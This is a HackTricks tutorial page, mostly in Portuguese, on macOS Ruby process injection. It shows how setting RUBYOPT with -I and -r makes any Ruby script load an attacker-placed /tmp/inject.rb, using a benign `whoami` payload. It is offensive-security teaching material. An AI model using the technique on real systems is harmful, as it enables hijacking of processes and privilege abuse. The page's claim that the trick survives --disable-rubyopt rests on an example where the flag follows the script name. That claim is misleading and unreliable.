hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

macOS Ruby Applications Injection

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

RUBYOPT

Usando esta variável de ambiente, é possível adicionar novos parâmetros ao ruby sempre que ele for executado. Embora o parâmetro -e não possa ser usado para especificar o código ruby a ser executado, é possível usar os parâmetros -I e -r para adicionar uma nova pasta ao caminho das bibliotecas a serem carregadas e, em seguida, especificar uma biblioteca para carregar.

Crie a biblioteca inject.rb em /tmp:

{% code title="inject.rb" %}

puts `whoami`

{% endcode %}

Crie em qualquer lugar um script ruby como:

{% code title="hello.rb" %}

puts 'Hello, World!'

{% endcode %}

Então faça um script ruby arbitrário carregá-lo com:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fato curioso, funciona mesmo com o parâmetro --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporte o HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

{% endhint %}